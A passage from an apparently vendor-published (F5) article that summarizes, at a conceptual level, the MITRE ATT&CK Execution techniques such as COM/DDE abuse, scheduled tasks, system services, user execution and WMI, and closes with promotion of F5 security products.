(IPC) is commonly used by processes to share data, exchange messages, or synchronize execution. It also helps prevent issues like deadlocks. However, IPC mechanisms can be abused by adversaries to execute arbitrary code or commands. The implementation of IPC varies across operating systems. Additionally, command and scripting interpreters may leverage underlying IPC mechanisms, and adversaries might exploit remote services—such as the Distributed Component Object Model (DCOM)—to enable remote IPC-based execution. (.001) Component Object Model (Windows): Component Object Model (COM) is an inter-process communication (IPC) mechanism in the Windows API that allows interaction between software objects. A client object can invoke methods on server objects via COM interfaces. Languages like C, C++, Java, and Visual Basic can be used to exploit COM interfaces for arbitrary code execution. Certain COM objects also support functions such as creating scheduled tasks, enabling fileless execution, and facilitating privilege escalation or persistence. (.002) Dynamic Data Exchange (Windows): Dynamic Data Exchange (DDE) is a client-server protocol used for one-time or continuous inter-process communication (IPC) between applications. Adversaries can exploit DDE in Microsoft Office documents—either directly or via embedded files—to execute commands without using macros. Similarly, DDE formulas in CSV files can trigger unintended operations. This technique may also be leveraged by adversaries on compromised systems where direct access to command or scripting interpreters is restricted. (.003) XPC Services(macOS): macOS uses XPC services for inter-process communication, such as between the XPC Service daemon and privileged helper tools in third-party apps. Applications define the communication protocol used with these services. Adversaries can exploit XPC services to execute malicious code, especially if the app’s XPC handler lacks proper client validation or input sanitization, potentially leading to privilege escalation. 9. T1106: Native API Native APIs provide controlled access to low-level kernel services, including those related to hardware, memory management, and process control. These APIs are used by the operating system during system boot and for routine operations. However, adversaries may abuse native API functions to carry out malicious actions. By using assembly directly or indirectly to invoke system calls, attackers can bypass user-mode security measures such as API hooks. Also, attackers may try to change or stop defensive tools that track API use by removing functions or changing sensor behavior. Many well-known exploit tools and malware families—such as Cobalt Strike, Emotet, Lazarus Group, LockBit 3.0, and Stuxnet—have leveraged Native API techniques to bypass security mechanisms, evade detection, and execute low-level malicious operations. 10. T1053: Scheduled Task/Job This technique involves adversaries abusing task scheduling features to execute malicious code at specific times or intervals. Task schedulers are available across major operating systems—including Windows, Linux, macOS, and containerized environments—and can also be used to schedule tasks on remote systems. Adversaries commonly use scheduled tasks for persistence, privilege escalation, and to run malicious payloads under the guise of trusted system processes. (.002) At: The “At” utility is available on Windows, Linux, and macOS for scheduling tasks to run at specific times. Adversaries can exploit “At” to execute programs at system startup or on a set schedule, helping them maintain persistence. It can also be misused for remote execution during lateral movement or to run processes under the context of a specific user account. In Linux environments, attackers may use “At “to break out of restricted environments, aiding in privilege escalation. (.003) Cron: The “cron” utility is a time-based job scheduler used in Unix-like operating systems. The “crontab” file contains scheduled tasks and the times at which they should run. These files are stored in system-specific file paths. Adversaries can exploit “cron” in Linux or Unix environments to execute programs at startup or on a set schedule, maintaining persistence. In ESXi environments, “cron” jobs must be created directly through the “crontab” file. (.005) Scheduled Task: Adversaries can misuse Windows Task Scheduler to run programs at startup or on a schedule, ensuring persistence. It can also be exploited for remote execution during lateral movement or to run processes under specific accounts (e.g., SYSTEM). Similar to System Binary Proxy Execution, attackers may hide one-time executions under trusted system processes. They can also create "hidden" tasks that are not visible to defender tools or manual queries. Additionally, attackers may alter registry metadata to further conceal these tasks. (.006) Systemd Timers: Systemd timers are files with a .timer extension used to control services in Linux, serving as an alternative to Cron. They can be activated remotely via the systemctl command over SSH. Each .timer file requires a corresponding .service file. Adversaries can exploit systemd timers to run malicious code at startup or on a schedule for persistence. Timers placed in privileged paths can maintain root-level persistence, while user-level timers can provide user-level persistence. (.007) Container Orchestration Job: Container orchestration jobs automate tasks at specific times, similar to cron jobs on Linux. These jobs can be configured to maintain a set number of containers, helping persist within a cluster. In Kubernetes, a CronJob schedules a Job that runs containers to perform tasks. Adversaries can exploit CronJobs to deploy Jobs that execute malicious code across multiple nodes in a cluster. 11. T1648: Serverless Execution Cloud providers offer various serverless resources such as compute functions, integration services, and web-based triggers that adversaries can exploit to execute arbitrary commands, hijack resources, or deploy functions for further compromise. Cloud events can also trigger these serverless functions, potentially enabling persistent and stealthy execution over time. An example of this is Pacu, a well-known open-source AWS exploitation framework, which leverages serverless execution techniques. 12. T1229: Shared Modules Shared modules are executable components loaded into processes to provide access to reusable code, such as custom functions or Native API calls. Adversaries can abuse this mechanism to execute arbitrary payloads by modularizing their malware into shared objects that perform various malicious functions. On Linux and macOS, the module loader can load shared objects from any local path. On Windows, the loader can load DLLs from both local paths and Universal Naming Convention (UNC) network paths. 13. T1072: Software Deployment Tools Adversaries may exploit centralized management tools to execute commands and move laterally across enterprise networks. Access to endpoint or configuration management platforms can enable remote code execution, data collection, or destructive actions like wiping systems. SaaS-based configuration management tools can also extend this control to cloud-hosted instances and on-premises systems. Similarly, configuration tools used in network infrastructure devices may be abused in the same way. The level of access required for such activity depends on the system’s configuration and security posture. 14. T1569: System Services System services and daemons can be abused to execute malicious commands or programs, whether locally or remotely. Creating or modifying services allows execution of payloads for persistence—particularly if set to run at startup—or for temporary, one-time actions. (.001) Launchctl (MacOS): launchctl interacts with launchd, the service management framework for macOS. It supports running subcommands via the command line, interactively, or from standard input. Adversaries can use launchctl to execute commands and programs as Launch Agents or Launch Daemons, either through scripts or manual commands. (.002) Service Execution (Windows): The Windows Service Control Manager (services.exe) manages services and is accessible through both the GUI and system utilities. Tools like PsExec and sc.exe can be used for remote execution by specifying remote servers. Adversaries may exploit these tools to execute malicious content by starting new or modified services. This technique is often used for persistence or privilege escalation. (.003) Systemctl (Linux): systemctl is the main interface for systemd, the Linux init system and service manager. It is typically used from a shell but can also be integrated into scripts or applications. Adversaries may exploit systemctl to execute commands or programs as systemd services. 15. T1204: User Execution Users may be tricked into running malicious code by opening a harmful file or link, often through social engineering. While this usually happens right after initial access, it can occur at other stages of an attack. Adversaries might also deceive users to enable remote access tools, run malicious scripts, or coercing users to manually download and execute malware. Tech support scams often use phishing, vishing, and fake websites, with scammers spoofing numbers or setting up fake call centers to steal access or install malware. (.001) Malicious Link: Users may be tricked into clicking on a link that triggers code execution. This could also involve exploiting a browser or application vulnerability (Exploitation for Client Execution). Additionally, links might lead users to download files that, when executed, deliver malware file. (.002) Malicious File: Users may be tricked into opening a file that leads to code execution. Adversaries often use techniques like masquerading and obfuscating files to make them appear legitimate, increasing the chances that users will open and execute the malicious file. (.003) Malicious Image: Cloud images from platforms like AWS, GCP, and Azure, as well as popular container runtimes like Docker, can be backdoored. These compromised images may be uploaded to public repositories and users might unknowingly download and deploy an instance or container, bypassing Initial Access defenses. Adversaries may also use misleading names to increase the chances of users mistakenly deploying the malicious image. (.004) Malicious Copy and Paste: Users may be deceived into copying and pasting malicious code into a Command or Scripting Interpreter. Malicious websites might display fake error messages or CAPTCHA prompts, instructing users to open a terminal or the Windows Run Dialog and run arbitrary, often obfuscated commands. Once executed, the adversary can gain access to the victim's machine. Phishing emails may also be used to trick users into performing this action. 16. T1047: Windows Management Instrumentation WMI (Windows Management Instrumentation) is a tool designed for programmers, providing a standardized way to manage and access data on Windows systems. It serves as an administrative feature that allows interaction with system components. Adversaries can exploit WMI to interact with both local and remote systems, using it to perform actions such as gathering information for discovery or executing commands and payloads. How F5 can help? F5 security solutions like WAF (Web Application Firewall), API security, and DDoS mitigation protect the applications and APIs across platforms including Clouds, Edge, On-prem or Hybrid, thereby reducing security risks. F5 bot and risk management solutions can also stop bad bots and automation. This can make your modern applications safer. The example attacks mentioned under techniques can be effectively mitigated by F5 products like Distributed Cloud, BIG-IP and NGINX. Here are a few links which explain the mitigation steps. Mitigating Cross-Site Scripting (XSS) using F5 Advanced WAF Mitigating Struts2 RCE using F5 BIG-IP For more details on the other mitigation techniques of MITRE ATT&CK Execution Tactic TA0002, please reach out to your local F5 team. Reference Links: MITRE ATT&CK® Execution, Tactic TA0002 - Enterprise | MITRE ATT&CK® MITRE ATT&CK: What It Is, How it Works, Who Uses It and Why | F5 Labs172Views2likes0Comments